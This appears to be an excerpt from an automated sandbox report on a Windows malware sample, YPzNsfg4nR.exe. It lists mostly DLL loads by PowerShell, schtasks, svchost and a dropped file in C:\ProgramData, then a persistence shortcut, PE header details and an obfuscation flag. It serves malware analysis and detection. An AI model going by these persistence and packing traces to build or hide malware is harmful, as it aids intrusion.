                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\ProgramData\codingSection loaded: mscoree.dll
                    Source: C:\ProgramData\codingSection loaded: apphelp.dll
                    Source: C:\ProgramData\codingSection loaded: kernel.appcore.dll
                    Source: C:\ProgramData\codingSection loaded: version.dll
                    Source: C:\ProgramData\codingSection loaded: vcruntime140_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: uxtheme.dll
                    Source: C:\ProgramData\codingSection loaded: sspicli.dll
                    Source: C:\ProgramData\codingSection loaded: cryptsp.dll
                    Source: C:\ProgramData\codingSection loaded: rsaenh.dll
                    Source: C:\ProgramData\codingSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                    Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                    Source: C:\ProgramData\codingSection loaded: mscoree.dll
                    Source: C:\ProgramData\codingSection loaded: kernel.appcore.dll
                    Source: C:\ProgramData\codingSection loaded: version.dll
                    Source: C:\ProgramData\codingSection loaded: vcruntime140_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: ucrtbase_clr0400.dll
                    Source: C:\ProgramData\codingSection loaded: uxtheme.dll
                    Source: C:\ProgramData\codingSection loaded: sspicli.dll
                    Source: C:\ProgramData\codingSection loaded: cryptsp.dll
                    Source: C:\ProgramData\codingSection loaded: rsaenh.dll
                    Source: C:\ProgramData\codingSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                    Source: coding.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\coding
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: YPzNsfg4nR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: YPzNsfg4nR.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: YPzNsfg4nR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: YPzNsfg4nR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdbSHA256J source: YPzNsfg4nR.exe
                    Source: Binary string: \ConsoleApp4\obj\Release\net4.8\win-x64\1fht7W0d34QhN.pdb source: YPzNsfg4nR.exe

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
